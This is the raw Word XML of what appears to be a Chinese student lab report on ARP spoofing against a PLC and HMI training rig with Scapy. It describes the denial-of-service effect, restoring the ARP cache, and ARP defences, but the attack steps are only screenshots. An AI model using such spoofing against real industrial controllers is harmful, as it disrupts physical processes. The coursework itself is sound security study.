        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-480" w:leftChars="0" w:firstLine="48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记录PLC地址：</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2680335"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="2" name="图片 2" descr="9490d3e32f9e83002c1d9348bcadc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490d3e32f9e83002c1d9348bcadcd6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="2680335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-480" w:leftChars="0" w:firstLine="4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记录HMI地址：</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325" cy="2675890"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="4" name="图片 4" descr="7f7c4a517b42bc1d24439455ff6c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f7c4a517b42bc1d24439455ff6c409"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2675890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-480" w:leftChars="0" w:firstLine="4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对PLC进行攻击，PLC拒绝服务，屏幕上的控制开关无效：</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455930"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="5" name="图片 5" descr="076ab4ee8ba80066f01aca376aea1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76ab4ee8ba80066f01aca376aea1c6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="45593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962910"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="7" name="图片 7" descr="44af2ba342a9920706c5a6b0b1f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4af2ba342a9920706c5a6b0b1f8376"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="2962910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-480" w:leftChars="0" w:firstLine="4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复原，PLC可以正常工作：</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6690" cy="391795"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="6" name="图片 6" descr="e07e41d575eaa98faef55b8e2d84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7e41d575eaa98faef55b8e2d843c7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="391795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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遇到的问题及解决方法</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问题：在第一步获取PLC地址的时候发送packet无法获取answer。</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解决方法：将除了与PLC连接的网卡都禁用之后就好了。</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rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3970020" cy="861060"/>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3970020" cy="861060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>回答问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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为什么攻击后需要复原现场？</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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验改写了HMI的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ARP 高速缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中192.168.1.3对应的Mac地址是攻击者电脑的Mac地址，不再是PLC的Mac地址，所以需要将正确的Mac地址改回去，使HMI能正常控制PLC。ARP 欺骗攻击是一种潜在的恶意行为，如果在实际网络中持续进行这样的攻击，将可能导致网络中断、数据泄漏等问题，对网络安全和用户隐私构成威胁，攻击后应该及时还原以维护网络的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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本实验的攻击效果与实验二中指令攻击的攻击效果有何异同？为什么？</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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：都让PLC无法正常工作，实验箱上触摸屏失效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异</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：实验二是实验箱按钮和屏幕都无法控制储水罐工作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>旋钮不再转动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；实验四是触摸屏失效但是实验箱上的按钮仍然可以控制储水罐运行，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>旋钮仍可以转动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</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原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：ARP 攻击主要影响网络通信，攻击者通过欺骗目标设备的 ARP 表，将网络流量引导到错误的物理地址，从而截取、篡改或阻止通信。攻击影响的范围通常限定在本地网络内。ARP 攻击可能导致网络中的设备无法正常通信，数据流量被截取，通信的机密性和完整性受到威胁。指令攻击主要影响目标系统的执行流程和指令集，可以涉及到操作系统、应用程序等各个层面。攻击的影响范围通常更广泛，可能对整个系统产生深远的影响。指令攻击可能导致系统崩溃、数据泄漏、服务拒绝等更为严重的后果。攻击者可以通过执行特定的指令来操纵系统行为，取得系统的控制权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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本实验中的ARP欺骗攻击对实验三中受到加密保护的系统是否有效？为什么？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有效。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实验三中利用密码学知识与工具，对系统进行加密，使该系统能够抵御指令重放攻击，攻击者在未经授权的情况下很难通过重放之前捕获到的命令来执行任何操作。不同于指令重放攻击，ARP 攻击主要涉及网络层的欺骗，尤其是欺骗目标设备的 ARP 表，将网络流量引导到攻击者控制的地址。即使当前系统已经加密，ARP 攻击可能会影响到系统之间的通信路径，使得通信的终点不再是预期的设备，而是攻击者的设备。这可能导致数据流量被截取、篡改或阻断，甚至可能影响到设备之间的正常交互。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-482" w:leftChars="0" w:firstLine="482" w:firstLineChars="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>简要探讨ARP攻击防范措施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常见的ARP攻击防范措施：</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静态ARP表格设置：将网络中的重要设备的IP地址和MAC地址手动添加到网络设备的ARP缓存中，形成静态ARP表格。这可以防止攻击者通过ARP欺骗篡改动态ARP表格。</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使用静态ARP绑定：网络管理员可以配置网络设备，强制指定某些IP地址只能与特定的MAC地址进行通信，从而限制ARP表项的修改。</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网络流量监测和分析：使用网络流量监测工具，及时检测和分析异常的ARP请求和响应。异常的大量ARP流量可能表明ARP攻击正在发生。</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使用网络加密：通过使用加密通信协议（如TLS、SSL）来保护通信内容，即使攻击者成功截获了流量，也难以解密其中的敏感信息。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ARP缓存超时设置：缩短ARP缓存的超时时间，使ARP表项更快地过期。这有助于减少攻击者对ARP缓存的滥用时间窗口。</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rPr>
        <w:t>ARP防火墙：部署ARP防火墙，限制只有授权的设备才能向网络中的其他设备发送ARP响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>收获感悟</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通过本次实验，我学会了Scapy的使用，也了解到ARP的作用和ARP欺骗攻击的原理，对物联网安全的意义有了更深入的体会。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06BCE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B506BCE"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1　"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-480" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="93812DCA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="93812DCA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1　"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-480" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="99C3E2A1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="99C3E2A1"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="BD9B4F48"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD9B4F48"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="D0E53E5E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D0E53E5E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="DBB7DB2B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DBB7DB2B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1　"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-270" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="E1F7BBE3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E1F7BBE3"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="E7178EDA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7178EDA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1　"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-270" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="F6DC9FAD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F6DC9FAD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="11078BA6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="11078BA6"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="171F199D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="171F199D"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="75F3D93E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="75F3D93E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1　"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-480" w:firstLine="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="7A65E455"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7A65E455"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>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0MmRmMTE1NjBkY2Y0MWI4MjEwOTJkMjZiYjE1ZTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00FC4D91"/>
    <w:rsid w:val="000064E7"/>
    <w:rsid w:val="00034C0A"/>
    <w:rsid w:val="00051765"/>
    <w:rsid w:val="00091F96"/>
    <w:rsid w:val="000B0136"/>
    <w:rsid w:val="0015467A"/>
    <w:rsid w:val="00172AC3"/>
    <w:rsid w:val="001C31C3"/>
    <w:rsid w:val="001D1665"/>
    <w:rsid w:val="00225CDB"/>
    <w:rsid w:val="002544B2"/>
    <w:rsid w:val="002A260D"/>
    <w:rsid w:val="002B5066"/>
    <w:rsid w:val="002D4D4F"/>
    <w:rsid w:val="0030186D"/>
    <w:rsid w:val="00320A5E"/>
    <w:rsid w:val="003C134E"/>
    <w:rsid w:val="00402A00"/>
    <w:rsid w:val="0040517C"/>
    <w:rsid w:val="00407A64"/>
    <w:rsid w:val="00427BF6"/>
    <w:rsid w:val="0046157D"/>
    <w:rsid w:val="00491A14"/>
    <w:rsid w:val="00502B52"/>
    <w:rsid w:val="00515D33"/>
    <w:rsid w:val="00533F18"/>
    <w:rsid w:val="005631A7"/>
    <w:rsid w:val="00570465"/>
    <w:rsid w:val="00571A49"/>
    <w:rsid w:val="00601799"/>
    <w:rsid w:val="006407E6"/>
    <w:rsid w:val="00675B07"/>
    <w:rsid w:val="00681296"/>
    <w:rsid w:val="006B6520"/>
    <w:rsid w:val="00702A15"/>
    <w:rsid w:val="00756C9A"/>
    <w:rsid w:val="007D1FC9"/>
    <w:rsid w:val="008066B2"/>
    <w:rsid w:val="008150A6"/>
    <w:rsid w:val="00854795"/>
    <w:rsid w:val="0085541F"/>
    <w:rsid w:val="008A024A"/>
    <w:rsid w:val="008F4DBF"/>
    <w:rsid w:val="00934905"/>
    <w:rsid w:val="0094091E"/>
    <w:rsid w:val="009A53A6"/>
    <w:rsid w:val="00A521C0"/>
    <w:rsid w:val="00A61C1D"/>
    <w:rsid w:val="00AA694D"/>
    <w:rsid w:val="00AE58AE"/>
    <w:rsid w:val="00B03D60"/>
    <w:rsid w:val="00B262CE"/>
    <w:rsid w:val="00B543FC"/>
    <w:rsid w:val="00B54E77"/>
    <w:rsid w:val="00B82AB9"/>
    <w:rsid w:val="00BE5349"/>
    <w:rsid w:val="00BF0FAD"/>
    <w:rsid w:val="00C228BC"/>
    <w:rsid w:val="00C56EB9"/>
    <w:rsid w:val="00C63243"/>
    <w:rsid w:val="00C63C7A"/>
    <w:rsid w:val="00CA3992"/>
    <w:rsid w:val="00CD0AEE"/>
    <w:rsid w:val="00D20567"/>
    <w:rsid w:val="00D26892"/>
    <w:rsid w:val="00D638AC"/>
    <w:rsid w:val="00D8236C"/>
    <w:rsid w:val="00D979D2"/>
    <w:rsid w:val="00DE742E"/>
    <w:rsid w:val="00E35D38"/>
    <w:rsid w:val="00EA2285"/>
    <w:rsid w:val="00EA7BCF"/>
    <w:rsid w:val="00ED263B"/>
    <w:rsid w:val="00F3073F"/>
    <w:rsid w:val="00F46609"/>
    <w:rsid w:val="00F8381F"/>
    <w:rsid w:val="00FA3465"/>
    <w:rsid w:val="00FA6ED1"/>
    <w:rsid w:val="00FC4D91"/>
    <w:rsid w:val="0482068E"/>
    <w:rsid w:val="04860FD8"/>
    <w:rsid w:val="052152BD"/>
    <w:rsid w:val="07ED7B2F"/>
    <w:rsid w:val="0892799C"/>
    <w:rsid w:val="0E357549"/>
    <w:rsid w:val="13CB3B05"/>
    <w:rsid w:val="15B556B4"/>
    <w:rsid w:val="183C29CB"/>
    <w:rsid w:val="1B3B345E"/>
    <w:rsid w:val="25F15FCA"/>
    <w:rsid w:val="2B8C005A"/>
    <w:rsid w:val="2D8E211C"/>
    <w:rsid w:val="2E623E14"/>
    <w:rsid w:val="34A90551"/>
    <w:rsid w:val="396376C8"/>
    <w:rsid w:val="3ECF38DD"/>
    <w:rsid w:val="3F3268E5"/>
    <w:rsid w:val="480A5F31"/>
    <w:rsid w:val="4D2717ED"/>
    <w:rsid w:val="52186701"/>
    <w:rsid w:val="54F54411"/>
    <w:rsid w:val="5549750C"/>
    <w:rsid w:val="569B251D"/>
    <w:rsid w:val="5900033B"/>
    <w:rsid w:val="59C547A9"/>
    <w:rsid w:val="5D066A46"/>
    <w:rsid w:val="5FAD3D0E"/>
    <w:rsid w:val="661164A2"/>
    <w:rsid w:val="68AA6A22"/>
    <w:rsid w:val="697516EB"/>
    <w:rsid w:val="6BE05665"/>
    <w:rsid w:val="6F5803DA"/>
    <w:rsid w:val="6F960E0D"/>
    <w:rsid w:val="75786D3D"/>
